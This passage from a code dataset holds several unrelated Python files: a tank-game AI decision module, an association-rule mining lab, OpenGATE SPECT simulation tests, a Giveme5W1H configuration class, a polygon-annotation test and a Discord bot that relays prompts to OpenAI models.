):\n for action in battler.try_dodge(oppBattler):\n if Action.is_move(action):\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n player.set_status(Status.READY_TO_DODGE)\n # 这里还是再判断一下距离\n route1 = battler.get_shortest_attacking_route()\n with map_.simulate_one_action(battler, action):\n route2 = battler.get_shortest_attacking_route()\n if route2.length > route1.length:\n player.set_status(Status.WILL_DODGE_TO_LONG_WAY)\n return realAction\n\n # 默认是优先射击\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY)\n return defenseAction\n\n\n # 如果不能射击,那么终究还是要闪避的\n # 或者是无法后方移动,为了打破僵局,尝试闪避\n #----------------------------------\n for action in dodgeActions:\n realAction = player.try_make_decision(action)\n if Action.is_move(realAction):\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n #\n # 因为这种情况很有可能会出现死循环 5cd009e0a51e681f0e8f3ffb\n # 为了后续能够打破这种情况,这里额外添加一个状态进行标记\n #\n player.set_status(Status.WILL_DODGE_TO_LONG_WAY)\n return realAction\n\n if Action.is_stay(defenseAction):\n #\n # 其实还有一种情况,那就是危险的敌人在自己身上! 5ceaaacdd2337e01c7adf6a4\n #\n riskyEnemyBattler = player.get_risky_enemy()\n if (riskyEnemyBattler is not None\n and riskyEnemyBattler is not oppBattler\n and riskyEnemyBattler.xy == battler.xy\n ): # 这种情况下实际是没有威胁的 ...\n for action in dodgeActions:\n player.set_status(Status.KEEP_ON_MARCHING, Status.READY_TO_DODGE)\n # TODO:\n # 还需要判断是否向远路闪避 ...\n # 这里的细节还需要优化,或者这个和自己重叠的条件在前面就要穿插进去\n return action\n\n player.set_status(Status.DYING) # 否则就凉了 ...\n\n return defenseAction\n\n return Action.STAY\n\n\n # 防御模式\n #----------\n # 1. 如果对方下回合必死,那么射击\n # 2. 优先堵路,距离远则尝试逼近\n # 3. 必要的时候对抗\n # 4. 
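The `with outer_label() as OUTER_BREAK: ... raise OUTER_BREAK` construct used just above is an exception-based labelled break that exits several nested loops at once. A self-contained sketch of how such a helper can be written (a plausible reconstruction, not necessarily the project's own outer_label):

from contextlib import contextmanager

@contextmanager
def outer_label():
    class _Break(Exception):  # a unique label per with-block
        pass
    try:
        yield _Break
    except _Break:
        pass  # swallow the jump; execution resumes after the with-block

found = None
with outer_label() as OUTER_BREAK:
    for i in range(5):
        for j in range(5):
            if i * j == 6:
                found = (i, j)
                raise OUTER_BREAK  # breaks out of both loops at once
print(found)  # (2, 3)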
距离远仍然优先\n #\n # elif status == DEFENSIVE_STATUS:\n # attackAction = self.try_make_decision(battler.get_next_attacking_action()) # 默认的侵略行为\n elif status == Status.DEFENSIVE:\n if not oppBattler.canShoot:\n\n if len( oppBattler.try_dodge(battler) ) == 0:\n if battler.canShoot: # 必死情况\n player.set_status(Status.READY_TO_KILL_ENEMY)\n return battler.shoot_to(oppBattler)\n #\n # 不能马上打死,敌人又无法攻击\n #-------------------------------\n # 优先堵路,根据双方距离判断\n #\n _route = battler.get_route_to_enemy_by_move(oppBattler)\n if _route.is_not_found():\n _route = battler.get_route_to_enemy_by_move(oppBattler, block_teammate=False)\n assert not _route.is_not_found(), \"route not found ?\" # 必定能找到路!\n assert _route.length > 0, \"unexpected overlapping enemy\"\n\n if _route.length == 1: # 双方相邻,选择等待\n\n # 此处首先延续一下对射状态\n if (player.has_status_in_previous_turns(Status.OPPOSITE_SHOOTING_WITH_ENEMY, turns=1) # 上回合正在和对方对射\n and not battler.canShoot # 但是我方本回合不能射击\n and not oppBattler.canShoot # 并且对方本回合不能射击\n ):\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 保持对射状态,用于后方打破僵持\n\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n elif _route.length > 2: # 和对方相隔两个格子以上\n if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全逼近\n action = battler.move_to(oppBattler)\n player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路 ...\n return action\n else:\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY # 否则只好等额爱\n else: # _route.length == 2:\n # 相距一个格子,可以前进也可以等待,均有风险\n #----------------------------------------\n # 1. 如果对方当前回合无法闪避,下一回合最多只能接近我\n # - 如果对方下回合可以闪避,那么我现在等待是意义不大的,不如直接冲上去和他重叠\n # - 如果对方下回合仍然不可以闪避,那么我就选择等待,反正它也走不了\n # 2. 如果对方当前回合可以闪避,那么默认冲上去和他重叠\n # - 如果我方可以射击,那么对方应该会判定为闪避,向两旁走,那么我方就是在和他逼近\n # - 如果我方不能射击,对方可能会选择继续进攻,如果对方上前和我重叠,就可以拖延时间\n #\n # TODO:\n # 好吧,这里的想法似乎都不是很好 ...\n # 能不防御就不防御,真理 ...\n #\n \"\"\"if len( oppBattler.try_dodge(battler) ) == 0:\n # 对手当前回合不可闪避,当然我方现在也不能射击。现在假设他下一步移向我\n action = oppBattler.move_to(battler) # 对方移向我\n if map_.is_valid_move_action(oppBattler, action):\n map_.simulate_one_action(oppBattler, action) # 提交模拟\n if len( oppBattler.try_dodge(battler) ) == 0:\n # 下回合仍然不可以闪避,说明可以堵路\n map_.revert()\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n map_.revert()\n # 否则直接冲上去\n if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全移动\n moveAction = battler.move_to(oppBattler)\n player.set_status(Status.READY_TO_BLOCK_ROAD) # 可以认为在堵路\n return moveAction\n else: # 冲上去不安全,那就只能等到了\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n else:\n # 对手当前回合可以闪避,那么尝试冲上去和他重叠\n # TODO:\n # 可能弄巧成拙 5cca97a4a51e681f0e8ad227\n #\n # 这个问题需要再根据情况具体判断!\n #\n '''\n if player.is_safe_to_close_to_this_enemy(oppBattler): # 可以安全重叠\n moveAction = battler.move_to(oppBattler)\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return moveAction\n else: # 有风险,考虑等待\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\n '''\n #\n # TODO:\n # 是否应该根据战场情况进行判断,比如停下来堵路对方一定无法走通?\n #\n # 假设自己为钢墙然后搜索对方路径?\n #\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY\"\"\"\n player.set_status(Status.READY_TO_BLOCK_ROAD)\n return Action.STAY # 似乎没有比这个这个更好的策略 ...\n # 对方可以射击\n else:\n if battler.canShoot: # 优先反击\n player.set_status(Status.READY_TO_FIGHT_BACK)\n if battler.on_the_same_line_with(oppBattler, ignore_brick=False):\n player.set_status(Status.OPPOSITE_SHOOTING_WITH_ENEMY) # 触发对射状态\n return battler.shoot_to(oppBattler)\n # 不能反击,只好闪避\n actions = battler.try_dodge(oppBattler)\n if len(actions) == 0:\n 
player.set_status(Status.DYING) # 凉了 ...\n action = Action.STAY\n elif len(actions) == 1:\n action = player.try_make_decision(actions[0])\n else: # len(actions) == 2:\n action = player.try_make_decision(actions[0],\n player.try_make_decision(actions[1]))\n if Action.is_move(action): # 统一判断\n player.set_status(Status.READY_TO_DODGE)\n return action\n # 否则就凉了 ...\n player.set_status(Status.DYING)\n\n return Action.STAY\n\n #\n # 回撤模式\n #------------\n # 1. 优先回撤\n # 2. 如果处在守卫状况,根据所处位置,选择反击或堵路\n #\n elif status == Status.WITHDRAW:\n base = map_.bases[battler.side]\n if not battler.is_closest_to(base):\n with player.create_snapshot():\n decision = WithdrawalDecision(player, signal)\n action = decision.make_decision()\n if decision.is_handled(action):\n with map_.simulate_one_action(battler, action):\n if oppTank not in battler.get_enemies_around(): # 安全行为\n return # 留给 withdraw 处理\n else:\n # 现在我方坦克已经处在基地附近\n with player.create_snapshot():\n decision = BaseDefenseDecision(player, signal)\n action = decision.make_decision()\n if decision.is_handled(action): # 符合 base defense 的条件\n with map_.simulate_one_action(battler, action):\n if oppTank not in battler.get_enemies_around(): # 安全行为\n return # 留给 base defense\n #\n # 否则就是不安全行为,应该予以反击\n #\n if battler.canShoot:\n player.set_status(Status.READY_TO_FIGHT_BACK)\n return battler.shoot_to(oppBattler)\n elif oppBattler.canShoot: # 否则应该闪避\n for action in battler.try_dodge(oppBattler):\n player.set_status(Status.READY_TO_DODGE)\n return action\n\n if oppBattler.canShoot:\n player.set_status(Status.DYING) # 不然就凉了 ...\n\n # 最后就等待\n return Action.STAY\n\n\n#{ END }#","repo_name":"zhongxinghong/Botzone-Tank2","sub_path":"core/decision/single/encount_enemy.py","file_name":"encount_enemy.py","file_ext":"py","file_size_in_byte":40160,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"} +{"seq_id":"3914069002","text":"import csv \nfrom mlxtend.frequent_patterns import fpgrowth, association_rules\nfrom timeit import timeit\nimport pandas as pd\n\ndef f_presence_matrix(invoices, all_items):\n position_dictionary = { k:v for v,k in enumerate(all_items)}\n presence_matrix = []\n n_items = len(all_items)\n for invoice in invoices.values():\n row = [False] * n_items\n for item in invoice:\n row[position_dictionary[item]] = True\n presence_matrix.append(row)\n return presence_matrix\n \n\n#2.1.1\ndata = []\nwith open('online_retail.csv') as or_file:\n for row in csv.reader(or_file):\n if not row[0].startswith('C'):\n data.append(row)\nheader = data.pop(0)\n\n#2.1.2\ninvoices = {}\nfor row in data:\n if row[0] not in invoices:\n invoices[row[0]] = set()\n invoices[row[0]].add(row[2])\n\n#2.1.3\nall_items_set = set()\nfor items in invoices.values():\n all_items_set.update(items)\nall_items = sorted(list(all_items_set))\npresence_matrix = f_presence_matrix(invoices, all_items)\ndf = pd.DataFrame(data=presence_matrix, columns=all_items)\n\n#2.1.4/5\nfreq_itemsets = fpgrowth(df, 0.02) \nprint((len(freq_itemsets))) #303\nprint(freq_itemsets[freq_itemsets[\"itemsets\"].map(len)>1])\n\n#2.1.6\nM = df.values\nsupport_2656 = len(M[M[:, 2656]]==True)/len(M)\nsupport_1599 = len(M[M[:, 1599]]==True)/len(M)\nsupport_tot = len(M[(M[:, 2656] == True) & (M[:, 1599] == True)])/len(M)\nprint(f\"Confidence 2656 => 1599: {support_tot / support_2656}\")\nprint(f\"Confidence 1599 => 2656: {support_tot / support_1599}\")\n\n#2.1.7\nfreq_itemsets = fpgrowth(df, 0.01) \nassociation_rules(freq_itemsets, 'confidence', 
0.85)","repo_name":"alessandroturrin/Data-Science-Lab","sub_path":"Lab03/ass_rules.py","file_name":"ass_rules.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11638334062","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport itk\nimport numpy as np\n\nimport opengate as gate\nimport opengate.contrib.spect.genm670 as gate_spect\nfrom opengate.userhooks import check_production_cuts\nfrom opengate.tests import utility\n\n\ndef create_spect_simu(sim, paths, number_of_threads=1):\n # main options\n sim.g4_verbose = False\n sim.visu = False\n sim.number_of_threads = number_of_threads\n sim.random_seed = 123456\n\n # units\n m = gate.g4_units.m\n cm = gate.g4_units.cm\n keV = gate.g4_units.keV\n mm = gate.g4_units.mm\n Bq = gate.g4_units.Bq\n kBq = 1000 * Bq\n\n # world size\n sim.world.size = [1 * m, 1 * m, 1 * m]\n sim.world.material = \"G4_AIR\"\n\n # spect head (debug mode = very small collimator)\n spect, crystal = gate_spect.add_ge_nm67_spect_head(\n sim, \"spect\", collimator_type=False, debug=False\n )\n psd = 6.11 * cm\n spect.translation = [0, 0, -(20 * cm + psd)]\n\n # waterbox\n waterbox = sim.add_volume(\"Box\", \"waterbox\")\n waterbox.size = [15 * cm, 15 * cm, 15 * cm]\n waterbox.material = \"G4_WATER\"\n blue = [0, 1, 1, 1]\n waterbox.color = blue\n\n # physic list\n sim.physics_manager.physics_list_name = \"G4EmStandardPhysics_option4\"\n sim.physics_manager.enable_decay = False\n\n sim.physics_manager.global_production_cuts.gamma = 10 * mm\n sim.physics_manager.global_production_cuts.electron = 10 * mm\n sim.physics_manager.global_production_cuts.positron = 10 * mm\n sim.physics_manager.global_production_cuts.proton = 10 * mm\n\n sim.physics_manager.set_production_cut(\n volume_name=\"spect\",\n particle_name=\"gamma\",\n value=0.1 * mm,\n )\n sim.physics_manager.set_production_cut(\n volume_name=\"spect\",\n particle_name=\"electron\",\n value=0.01 * mm,\n )\n sim.physics_manager.set_production_cut(\n volume_name=\"spect\",\n particle_name=\"positron\",\n value=0.1 * mm,\n )\n\n # default source for tests\n activity = 30 * kBq\n beam1 = sim.add_source(\"GenericSource\", \"beam1\")\n beam1.mother = waterbox.name\n beam1.particle = \"gamma\"\n beam1.energy.mono = 140.5 * keV\n beam1.position.type = \"sphere\"\n beam1.position.radius = 3 * cm\n beam1.position.translation = [0, 0, 0 * cm]\n beam1.direction.type = \"momentum\"\n beam1.direction.momentum = [0, 0, -1]\n # beam1.direction.type = 'iso'\n beam1.activity = activity / sim.number_of_threads\n\n beam2 = sim.add_source(\"GenericSource\", \"beam2\")\n beam2.mother = waterbox.name\n beam2.particle = \"gamma\"\n beam2.energy.mono = 140.5 * keV\n beam2.position.type = \"sphere\"\n beam2.position.radius = 3 * cm\n beam2.position.translation = [18 * cm, 0, 0]\n beam2.direction.type = \"momentum\"\n beam2.direction.momentum = [0, 0, -1]\n # beam2.direction.type = 'iso'\n beam2.activity = activity / sim.number_of_threads\n\n beam3 = sim.add_source(\"GenericSource\", \"beam3\")\n beam3.mother = waterbox.name\n beam3.particle = \"gamma\"\n beam3.energy.mono = 140.5 * keV\n beam3.position.type = \"sphere\"\n beam3.position.radius = 1 * cm\n beam3.position.translation = [0, 10 * cm, 0]\n beam3.direction.type = \"momentum\"\n beam3.direction.momentum = [0, 0, -1]\n # beam3.direction.type = 'iso'\n beam3.activity = activity / sim.number_of_threads\n\n # add stat actor\n stats_actor = 
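The confidence values printed by ass_rules.py above follow directly from the definitions supp(X) = fraction of transactions containing X and conf(A => B) = supp(A and B) / supp(A). A tiny numeric sketch with made-up transactions:

transactions = [{"A", "B"}, {"A"}, {"A", "B"}, {"B"}, {"A", "B"}]
n = len(transactions)

supp_a = sum("A" in t for t in transactions) / n          # 0.8
supp_b = sum("B" in t for t in transactions) / n          # 0.8
supp_ab = sum({"A", "B"} <= t for t in transactions) / n  # 0.6

print(supp_ab / supp_a)  # conf(A => B) = 0.75
print(supp_ab / supp_b)  # conf(B => A) = 0.75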
sim.add_actor(\"SimulationStatisticsActor\", \"Stats\")\n stats_actor.track_types_flag = True\n\n # hits collection\n hc = sim.add_actor(\"DigitizerHitsCollectionActor\", \"Hits\")\n # get crystal volume by looking for the word crystal in the name\n for k, v in sim.volume_manager.volumes.items():\n if \"crystal\" in k:\n crystal = v\n hc.mother = crystal.name\n print(\"Crystal :\", crystal.name)\n hc.output = paths.output / \"test028.root\"\n hc.attributes = [\n \"PostPosition\",\n \"TotalEnergyDeposit\",\n \"TrackVolumeCopyNo\",\n \"PostStepUniqueVolumeID\",\n \"PreStepUniqueVolumeID\",\n \"GlobalTime\",\n \"KineticEnergy\",\n \"ProcessDefinedStep\",\n ]\n\n # singles collection\n sc = sim.add_actor(\"DigitizerAdderActor\", \"Singles\")\n sc.mother = crystal.name\n sc.input_digi_collection = \"Hits\"\n sc.policy = \"EnergyWinnerPosition\"\n # sc.policy = 'EnergyWeightedCentroidPosition'\n sc.skip_attributes = [\"KineticEnergy\", \"ProcessDefinedStep\", \"KineticEnergy\"]\n sc.output = hc.output\n\n # EnergyWindows\n cc = sim.add_actor(\"DigitizerEnergyWindowsActor\", \"EnergyWindows\")\n cc.mother = crystal.name\n cc.input_digi_collection = \"Singles\"\n cc.channels = [\n {\"name\": \"scatter\", \"min\": 114 * keV, \"max\": 126 * keV},\n {\"name\": \"peak140\", \"min\": 126 * keV, \"max\": 154.55 * keV},\n {\n \"name\": \"spectrum\",\n \"min\": 0 * keV,\n \"max\": 5000 * keV,\n }, # should be strictly equal to 'Singles'\n ]\n cc.output = hc.output\n\n \"\"\"\n The order of the actors is important !\n 1. Hits\n 2. Singles\n 3. EnergyWindows\n \"\"\"\n\n # sec = gate.g4_units('second')\n # sim.run_timing_intervals = [[0, 0.5 * sec], [0.5 * sec, 1 * sec]]\n\n # user hook function\n sim.user_fct_after_init = check_production_cuts\n\n return spect\n\n\ndef test_add_proj(sim, paths):\n mm = gate.g4_units.mm\n for k, v in sim.volume_manager.volumes.items():\n if \"crystal\" in k:\n crystal = v\n # 2D binning projection\n proj = sim.add_actor(\"DigitizerProjectionActor\", \"Projection\")\n proj.mother = crystal.name\n # we set two times the spectrum channel to compare with Gate output\n proj.input_digi_collections = [\"spectrum\", \"scatter\", \"peak140\", \"spectrum\"]\n proj.spacing = [4.41806 * mm, 4.41806 * mm]\n proj.size = [128, 128]\n # proj.plane = 'XY' # not implemented yet # FIXME\n proj.output = paths.output / \"proj028.mhd\"\n # by default, the origin of the images are centered\n # set to False here to keep compatible with previous version\n proj.origin_as_image_center = False\n return proj\n\n\ndef test_spect_hits(output, paths, version=\"2\"):\n # stat\n gate.exception.warning(\"Compare stats\")\n stats = output.get_actor(\"Stats\")\n print(stats)\n print(f\"Number of runs was {stats.counts.run_count}. 
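The DigitizerEnergyWindowsActor configured above sorts each single into named energy channels. Outside of GATE the same binning is a few lines of plain Python; a sketch reusing the window bounds from that configuration (keV values copied verbatim):

channels = [
    {"name": "scatter",  "min": 114.0, "max": 126.0},
    {"name": "peak140",  "min": 126.0, "max": 154.55},
    {"name": "spectrum", "min": 0.0,   "max": 5000.0},
]

def classify(energy_kev):
    # one event can fall into several overlapping windows
    return [c["name"] for c in channels if c["min"] <= energy_kev < c["max"]]

print(classify(140.5))  # ['peak140', 'spectrum']
print(classify(120.0))  # ['scatter', 'spectrum']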
Set to 1 before comparison\")\n stats.counts.run_count = 1 # force to 1\n stats_ref = utility.read_stat_file(paths.gate_output / f\"stat{version}.txt\")\n is_ok = utility.assert_stats(stats, stats_ref, tolerance=0.07)\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare hits\")\n gate_file = paths.gate_output / f\"hits{version}.root\"\n hc_file = output.get_actor(\"Hits\").user_info.output\n print(hc_file)\n checked_keys = [\n {\"k1\": \"posX\", \"k2\": \"PostPosition_X\", \"tol\": 1.7, \"scaling\": 1},\n {\"k1\": \"posY\", \"k2\": \"PostPosition_Y\", \"tol\": 1.3, \"scaling\": 1},\n {\"k1\": \"posZ\", \"k2\": \"PostPosition_Z\", \"tol\": 0.9, \"scaling\": 1},\n {\"k1\": \"edep\", \"k2\": \"TotalEnergyDeposit\", \"tol\": 0.001, \"scaling\": 1},\n {\"k1\": \"time\", \"k2\": \"GlobalTime\", \"tol\": 0.01, \"scaling\": 1e-9},\n ]\n is_ok = (\n utility.compare_root2(\n gate_file,\n hc_file,\n \"Hits\",\n \"Hits\",\n checked_keys,\n paths.output / f\"test028_{version}_hits.png\",\n n_tol=4,\n )\n and is_ok\n )\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare singles\")\n gate_file = paths.gate_output / f\"hits{version}.root\"\n hc_file = output.get_actor(\"Singles\").user_info.output\n checked_keys = [\n {\"k1\": \"globalPosX\", \"k2\": \"PostPosition_X\", \"tol\": 1.8, \"scaling\": 1},\n {\"k1\": \"globalPosY\", \"k2\": \"PostPosition_Y\", \"tol\": 1.3, \"scaling\": 1},\n {\"k1\": \"globalPosZ\", \"k2\": \"PostPosition_Z\", \"tol\": 0.2, \"scaling\": 1},\n {\"k1\": \"energy\", \"k2\": \"TotalEnergyDeposit\", \"tol\": 0.001, \"scaling\": 1},\n ]\n is_ok = (\n utility.compare_root2(\n gate_file,\n hc_file,\n \"Singles\",\n \"Singles\",\n checked_keys,\n paths.output / f\"test028_{version}_singles.png\",\n )\n and is_ok\n )\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare singles and spectrum (must be strictly equal)\")\n ref_file = output.get_actor(\"Singles\").user_info.output\n hc_file = output.get_actor(\"EnergyWindows\").user_info.output\n checked_keys = [\n {\"k1\": \"PostPosition_X\", \"k2\": \"PostPosition_X\", \"tol\": 0.001, \"scaling\": 1},\n {\"k1\": \"PostPosition_Y\", \"k2\": \"PostPosition_Y\", \"tol\": 0.001, \"scaling\": 1},\n {\"k1\": \"PostPosition_Z\", \"k2\": \"PostPosition_Z\", \"tol\": 0.001, \"scaling\": 1},\n {\n \"k1\": \"TotalEnergyDeposit\",\n \"k2\": \"TotalEnergyDeposit\",\n \"tol\": 0.001,\n \"scaling\": 1,\n },\n ]\n is_ok = (\n utility.compare_root2(\n ref_file,\n hc_file,\n \"Singles\",\n \"spectrum\",\n checked_keys,\n paths.output / f\"test028_{version}_spectrum.png\",\n n_tol=0.01,\n )\n and is_ok\n )\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare scatter\")\n hc_file = output.get_actor(\"EnergyWindows\").user_info.output\n checked_keys = [\n {\"k1\": \"globalPosX\", \"k2\": \"PostPosition_X\", \"tol\": 20, \"scaling\": 1},\n {\"k1\": \"globalPosY\", \"k2\": \"PostPosition_Y\", \"tol\": 15, \"scaling\": 1},\n {\"k1\": \"globalPosZ\", \"k2\": \"PostPosition_Z\", \"tol\": 1.8, \"scaling\": 1},\n {\"k1\": \"energy\", \"k2\": \"TotalEnergyDeposit\", \"tol\": 0.2, \"scaling\": 1},\n ]\n is_ok = (\n utility.compare_root2(\n gate_file,\n hc_file,\n \"scatter\",\n \"scatter\",\n checked_keys,\n paths.output / f\"test028_{version}_scatter.png\",\n n_tol=15,\n )\n and is_ok\n )\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare peak\")\n hc_file = output.get_actor(\"EnergyWindows\").user_info.output\n checked_keys = [\n {\"k1\": \"globalPosX\", \"k2\": 
\"PostPosition_X\", \"tol\": 1.7, \"scaling\": 1},\n {\"k1\": \"globalPosY\", \"k2\": \"PostPosition_Y\", \"tol\": 1, \"scaling\": 1},\n {\"k1\": \"globalPosZ\", \"k2\": \"PostPosition_Z\", \"tol\": 0.21, \"scaling\": 1},\n {\"k1\": \"energy\", \"k2\": \"TotalEnergyDeposit\", \"tol\": 0.1, \"scaling\": 1},\n ]\n is_ok = (\n utility.compare_root2(\n gate_file,\n hc_file,\n \"peak140\",\n \"peak140\",\n checked_keys,\n paths.output / f\"test028_{version}_peak.png\",\n n_tol=2.1,\n )\n and is_ok\n )\n\n return is_ok\n\n\ndef test_spect_proj(output, paths, proj, version=\"3\"):\n print()\n stats = output.get_actor(\"Stats\")\n stats.counts.run_count = 1 # force to 1 to compare with gate result\n print(stats)\n stats_ref = utility.read_stat_file(paths.gate_output / f\"stat{version}.txt\")\n is_ok = utility.assert_stats(stats, stats_ref, 0.025)\n\n # compare images with Gate\n print()\n print(\"Compare images (old spacing/origin)\")\n # read image and force change the offset to be similar to old Gate\n img = itk.imread(str(paths.output / \"proj028.mhd\"))\n spacing = np.array(proj.user_info.spacing)\n origin = spacing / 2.0\n origin[2] = 0.5\n spacing[2] = 1\n img.SetSpacing(spacing)\n img.SetOrigin(origin)\n itk.imwrite(img, str(paths.output / \"proj028_offset.mhd\"))\n is_ok = (\n utility.assert_images(\n paths.gate_output / f\"projection{version}.mhd\",\n paths.output / \"proj028_offset.mhd\",\n stats,\n tolerance=16,\n ignore_value=0,\n axis=\"y\",\n sum_tolerance=1.6,\n fig_name=paths.output / f\"proj028_{version}_offset.png\",\n )\n and is_ok\n )\n\n # compare images with Gate\n if version == \"3_blur\":\n return is_ok\n print()\n print(\"Compare images (new spacing/origin\")\n # read image and force change the offset to be similar to old Gate\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"proj028_ref.mhd\",\n paths.output / \"proj028.mhd\",\n stats,\n tolerance=14,\n ignore_value=0,\n axis=\"y\",\n sum_tolerance=1.5,\n fig_name=paths.output / f\"proj028_{version}_no_offset.png\",\n )\n and is_ok\n )\n\n return is_ok\n","repo_name":"OpenGATE/opengate","sub_path":"opengate/tests/src/test028_ge_nm670_spect_2_helpers.py","file_name":"test028_ge_nm670_spect_2_helpers.py","file_ext":"py","file_size_in_byte":12475,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"3"} +{"seq_id":"8424938071","text":"class Configuration:\n \"\"\"\n These flags can be used to change the giveme5w configuration\n \"\"\"\n __config = {\n \"candidate\": {\n \"text\": True, # Concatenated 'originalText' from nlpToken\n \"nlpIndexSentence\": True, # determined by CoreNlp: include index of sentence\n \"parts\": {\n \"nlpToken\": True # determined by CoreNlp: Tag\n },\n \"score\": True # determined by Giveme5W: calculated score for this candidate\n },\n \"label\": True, # This repeating information is useful for template engines\n \"onlyTopCandidate\": False, # Return only the Candidate with the best score per question\n \"Giveme5W-runtime-resources\": './runtime-resources/', # Runtime directory\n \"fiveWoneH_enhancer_full\": True # include the entire enhancer data\n }\n\n @classmethod\n def get(cls):\n return cls.__config;\n","repo_name":"fhamborg/Giveme5W1H","sub_path":"Giveme5W1H/extractor/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":485,"dataset":"github-code","pt":"3"} +{"seq_id":"71505090642","text":"\"\"\"\nTest file for Polygon annotation tool : 
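test_spect_proj above rewrites the projection's spacing and origin so that the new image (origin at the volume center by default) can be compared against old-GATE output (origin half a pixel from the corner). A small numpy sketch of the two origin conventions; the centered formula -(size - 1) / 2 * spacing is the common convention, assumed here rather than taken from the opengate source:

import numpy as np

size = np.array([128, 128, 1])               # voxels per axis
spacing = np.array([4.41806, 4.41806, 1.0])  # mm

centered_origin = -(size - 1) / 2.0 * spacing  # image centered on (0, 0, 0)
corner_origin = spacing / 2.0                  # half-pixel offset convention

print(centered_origin)  # approx [-280.55 -280.55   -0.  ]
print(corner_origin)    # [2.20903 2.20903 0.5]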
customizable tool kit for annotating\npolygons on the screen (given image or any canvas), along with\nfeature to store, annotate and load them\nAuthor: Abhishek Roushan abhishek.roushan12@gmail.com\n\"\"\"\n\nfrom polygonAnnotation import *\n\n\ndef testPolygonsWrite(polys=[]):\n txtFileName = \"./data.txt\"\n writer = TextWriter(txtFileName)\n polygons = [Polygon([Point2d(0,0), Point2d(1,0), Point2d(0,1)]),\n Polygon([Point2d(-3.4,5), Point2d(5,7), Point2d(6.7,2.1), Point2d(4.33, 5.1)])]\n writePoly = polygons if len(polys)==0 else polys\n writer.writePolygonsToFile(polygons)\n\n\n# testPolygonsWrite()\n\ndef testCanvas():\n c = Canvas()\n c.create()\n\ntestCanvas()\n\n\n","repo_name":"abhishekroushan/polygonAnnotationTool","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12807604357","text":"import discord\nimport os\nimport requests\nimport re\nimport logging\n\nfrom googlesearch import search\n\nfrom .gpt import *\n\nlogging.basicConfig(level=logging.INFO, format=\"[%(levelname)s] %(name)s :: %(message)s\")\nlog = logging.getLogger()\ndiscord_logger = logging.getLogger('discord')\ndiscord_logger.setLevel(logging.ERROR)\n\nHELP_MSG = \"\"\"\nHello there! I'm Dilbot, and I'm just here to help you suffer through your workday. :sun_with_face:\n\n**How to use me:**\n\nAll commands start with pinging me (noted by `` below):\n```\n image of {prompt} | Generate image with DALL-E\n xkcd {prompt} | Search for an XKCD by that prompt\n {anything else} | Run the text in OpenAI GPT 3.5\n```\n\nIf DALL-E or GPT functions would return an error, or if you butt up against the\nGPT content moderation rules, I will simply reply with\n> :warning: Can't do that sorry\nGPT can be...wordy with those responses. Nobody needs that.\n\nAdditionally, GPT functionality is setup to only respond in **100 words or less!**\n_This is to save Max money. Shit's expensive, yo._\n\n_Please note that DALL-E and GPT 3.5 commands cost Max money! 
Be nice.\n**I keep track of usage, and will send you an invoice if you misbehave**_ :smiling_imp:\n\"\"\"\nBOT_ROLE = '1086130719849463822'\n\n\nclass ChatClient(discord.Client):\n message: list[str] = []\n\n async def on_ready(self):\n log.info(f\"{self.user} has connected to Discord\")\n\n async def on_message(self, message: discord.Message):\n # Ignore own messages\n if message.author == self.user:\n return\n log.info(f\"Message seen: {message.content}\\n From: {message.author}\")\n # Matches both pinging the bot and the role, just in case\n ping_regex = re.compile(f'^<@&?(?:{self.user.id}|{BOT_ROLE})> (.*)')\n result = ping_regex.findall(message.content)\n # Bot was pinged\n if result:\n log.info(\"Parsing as ping to Dilbot\")\n prompt = result[0]\n if \"help\" == prompt.lower():\n resp = HELP_MSG\n elif \"image of \" == prompt[0:9]:\n log.info(\"Paging DALL-E\")\n resp = gpt_image(prompt[9:])\n elif prompt.startswith(\"xkcd \"):\n log.info(\"XKCD lookup\")\n result = search(prompt, tld='com', num=1, stop=1)\n try:\n link = next(result)\n log.info(f\"Link: {link}\")\n resp = f\":link: {link}\"\n except StopIteration:\n log.warning(f\"Couldn't find an XKCD result for '{prompt}'\")\n resp = f\":warning: No results, sorry\"\n else:\n log.info(\"Paging ChatGPT\")\n resp = gpt_parse(prompt)\n await message.reply(resp)\n return\n\n\ndef main():\n token = os.getenv(\"DISCORD_TOKEN\")\n openai.organization = os.getenv(\"GPT_ORG\")\n openai.api_key = os.getenv(\"GPT_TOKEN\")\n if not token or not openai.api_key or not openai.organization:\n log.fatal(\n f\"ERROR: MISSING ONE OF THE REQUIRED ENV VARIABLES:\\n\"\n \" - DISCORD_TOKEN\\n\"\n \" - GPT_TOKEN\\n\"\n \" - GPT_ORG\"\n )\n exit(1)\n client = ChatClient()\n 